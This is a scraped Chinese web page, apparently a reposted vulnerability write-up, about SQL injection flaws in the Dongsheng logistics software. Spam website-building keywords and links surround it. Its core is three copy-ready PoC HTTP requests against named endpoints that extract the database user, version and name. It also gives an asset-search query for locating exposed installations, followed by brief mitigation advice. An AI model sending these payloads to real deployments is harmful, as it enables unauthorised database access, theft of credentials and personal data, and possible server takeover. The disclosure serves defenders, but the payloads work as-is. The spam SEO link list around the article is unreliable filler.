当前位置: 首页 > news >正文

怎样制作微信网站深圳网站建设选哪家

news 2025/11/6 9:57:44
怎样制作微信网站,深圳网站建设选哪家,四大战略咨询公司,阿里云可以建设多个网站0x01 产品简介 东胜物流软件是一款致力于为客户提供IT支撑的 SOP, 帮助客户大幅提高工作效率,降低各个环节潜在风险的物流软件。 0x02 漏洞概述 东胜物流软件 TCodeVoynoAdapter.aspx、/TruckMng/MsWlDriver/GetDataList、/MvcShipping/MsBaseInfo/Sav…

0x01 产品简介

 东胜物流软件是一款致力于为客户提供IT支撑的 SOP, 帮助客户大幅提高工作效率,降低各个环节潜在风险的物流软件。

0x02 漏洞概述

东胜物流软件 TCodeVoynoAdapter.aspx、/TruckMng/MsWlDriver/GetDataList、/MvcShipping/MsBaseInfo/SaveUserQuerySetting等接口处存在 SQL 注入漏洞,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。

0x03 复现环境

微步资产测绘:app=东胜物流软件

0x04 漏洞复现 

PoC-1

GET /FeeCodes/TCodeVoynoAdapter.aspx?mask=0&pos=0&strVESSEL=1%27+and+user+%3E0%3B-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip

查询当前用户

PoC-2 

GET /TruckMng/MsWlDriver/GetDataList?_dc=1665626804091&start=0&limit=30&sort=&condition=123+IN+(CHAR(113)%2bCHAR(120)%2bCHAR(112)%2bCHAR(113)%2bCHAR(113)%2bCHAR(32)%2b(select+%40%40version)%2bCHAR(32)%2bCHAR(113)%2bCHAR(122)%2bCHAR(107)%2bCHAR(113)%2bCHAR(113))--%20&page=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip

查询数据库版本

PoC-3

POST /MvcShipping/MsBaseInfo/SaveUserQuerySetting HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15formname=MsRptSaleBalProfitShareIndex'+AND+2523+IN+(SELECT+(CHAR(113)%2bCHAR(120)%2bCHAR(112)%2bCHAR(113)%2bCHAR(113)%2b(SELECT+SUBSTRING((ISNULL(CAST((+db_name%28%29)+AS+NVARCHAR(4000)),CHAR(32))),1,1024))%2bCHAR(113)%2bCHAR(122)%2bCHAR(107)%2bCHAR(113)%2bCHAR(113)))+AND+'uKco'%3d'uKco&isvisible=true&issavevalue=true&querydetail=%7B%22PS_MBLNO%22%3A%22%22%2C%22PS_VESSEL%22%3A%22%22%2C%22PS_VOYNO%22%3A%22%22%2C%22PS_SALE%22%3A%22%5Cu91d1%5Cu78ca%22%2C%22PS_OP%22%3Anull%2C%22PS_EXPDATEBGN%22%3A%222020-02-01%22%2C%22PS_EXPDATEEND%22%3A%222020-02-29%22%2C%22PS_STLDATEBGN%22%3A%22%22%2C%22PS_STLDATEEND%22%3A%22%22%2C%22PS_ACCDATEBGN%22%3A%22%22%2C%22PS_ACCDATEEND%22%3A%22%22%2C%22checkboxfield-1188-inputEl%22%3A%22on%22%2C%22PS_CUSTSERVICE%22%3Anull%2C%22PS_DOC%22%3Anull%2C%22hiddenfield-1206-inputEl%22%3A%22%22%7D}

 查询当前数据库

0x05 修复建议

官方暂未修复该漏洞,请用户联系厂商修复漏洞:http://www.dongshengsoft.com/

部署Web应用防火墙,对数据库操作进行监控。

如非必要,禁止公网访问该系统。

 

http://www.yayakq.cn/news/111885/

相关文章:

  • 岳阳网站定制昆明专业网站建设
  • 域名注册官方网站厦门网站制作报价
  • 营销推广型网站价格多种大连网站建设
  • 生活做爰网站做一个网页版面多少钱
  • 高端的网站名称深圳微信网站建设公司哪家好
  • 网站开发方倍工作室网站建设比较好的公司都有哪些
  • 2019年开公司做网站可以吗线上推广有哪些渠道
  • 青岛设计网站的公司展示空间设计作品
  • 深圳 电子政务网站建设方案公众号上传wordpress
  • 网站建设的总体需求分析网站开发与维护难学吗
  • 盐城市网站建设wordpress foundation
  • 企业网站的建设与实现加工厂怎么找订单
  • 有域名怎么做公司网站广西平台网站建设设计
  • 电商网站运营团队建设方案模板腾宁科技做网站399元全包
  • 网站群的建设目标重庆荣昌网站建设
  • 用自己的名字做网站域名网站建设的实验步骤
  • 上海网站开发售后服务app网站与普通网站的区别是什么
  • 宿州哪有做网站的营销型网站制作平台
  • 江阴规划建设局网站温州seo全网营销
  • 应该知道的网站线上营销的好处
  • 哈尔滨建站模板搭建网站开发报价清单
  • 自己做网站送外卖公司网站做的一样算不算侵权6
  • 毕业设计做系统网站北京移动端网站
  • 建设银行贵阳银行下载官方网站网站域名备案变更
  • asp公司企业网站模板源代码东莞推广宣传短视频
  • 简单描述一下网站制作的流程网站商城建设需求表
  • 怎么样让网站网址有图标做智能网站软件
  • 北京网站建设方案软件wordpress模板汉化教程视频
  • asp sqlite网站空间网络推广团队分工
  • 网站建设价格正规电子商务网站建设实训步骤